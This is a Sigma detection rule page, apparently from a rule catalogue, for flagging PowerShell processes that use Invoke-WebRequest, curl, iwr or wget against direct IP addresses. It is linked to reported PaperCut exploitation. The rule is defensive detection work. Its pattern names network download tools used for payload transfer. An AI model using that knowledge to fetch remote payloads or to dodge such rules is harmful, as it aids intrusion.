Suspicious Invoke-WebRequest Execution With DirectIP
Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access
Sigma rule (View on GitHub)
1title: Suspicious Invoke-WebRequest Execution With DirectIP
2id: 1edff897-9146-48d2-9066-52e8d8f80a2f
3status: test
4description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access
5references:
6 - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software
7author: Nasreddine Bencherchali (Nextron Systems)
8date: 2023-04-21
9tags:
10 - attack.command-and-control
11 - attack.t1105
12logsource:
13 category: process_creation
14 product: windows
15detection:
16 selection_img:
17 - Image|endswith:
18 - '\powershell.exe'
19 - '\pwsh.exe'
20 - OriginalFileName:
21 - 'PowerShell.EXE'
22 - 'pwsh.dll'
23 selection_commands:
24 CommandLine|contains:
25 # These are all aliases of Invoke-WebRequest
26 - 'curl '
27 - 'Invoke-WebRequest'
28 - 'iwr '
29 - 'wget '
30 selection_ip:
31 # In case of FP with local IPs add additional filters
32 CommandLine|contains:
33 - '://1'
34 - '://2'
35 - '://3'
36 - '://4'
37 - '://5'
38 - '://6'
39 - '://7'
40 - '://8'
41 - '://9'
42 condition: all of selection_*
43falsepositives:
44 - Unknown
45level: medium
References
-
Our team is tracking in-the-wild exploitation of zero-day vulnerabilities against PaperCut MF/NG which allow for unauthenticated remote code execution due to an authentication bypass.
Read More
Related rules
- AppX Package Installation Attempts Via AppInstaller.EXE
- Arbitrary File Download Via GfxDownloadWrapper.EXE
- Browser Execution In Headless Mode
- Cisco Stage Data
- Command Line Execution with Suspicious URL and AppData Strings